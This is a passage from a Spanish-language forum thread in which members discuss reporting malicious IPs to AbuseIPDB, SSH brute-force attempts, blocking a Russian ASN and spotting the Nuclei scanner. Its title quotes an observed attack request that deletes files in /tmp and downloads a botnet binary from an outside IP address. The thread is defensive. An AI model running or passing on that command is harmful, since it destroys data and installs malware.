GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86

Iniciado por el-brujo, 19 Diciembre 2020, 12:43 PM

0 Miembros y 2 Visitantes están viendo este tema.

Danielㅤ

Me parece muy bien que ayudes a reportar las IPs maliciosas, conozco esa página y es muy buena por cierto.
Yo en mis tiempos usaba EfnetRBL y DroneBL.


Saludos
¡Regresando como cual Fenix! ~
Bomber Code © 2021 https://www.bombercode.net/foro/

Ayudas - Aportes - Tutoriales - Y mucho mas!!!

el-brujo

#21
Empiezan los reportes:

https://www.abuseipdb.com/user/52197

De momento intentos SSH fallidos (SSH Brute Force Attacks). Después añadiremos ataques FTP fuerza bruta y reglas mod_security.



Uno de las ip's que le encanta buscar por copias sql es el ASN Russia AS49505 SELECTEL. Bloqueado entero, porque su tráfico no hace otra cosa más que buscar vulnerabilidades

Y uno de los escaners utilizados es (User-Agent)

Nuclei - Open-source project (github.com/projectdiscovery/nuclei)

Danielㅤ

Bien brujo, más de 440 IPs reportadas hasta ahora! 


Saludos
¡Regresando como cual Fenix! ~
Bomber Code © 2021 https://www.bombercode.net/foro/

Ayudas - Aportes - Tutoriales - Y mucho mas!!!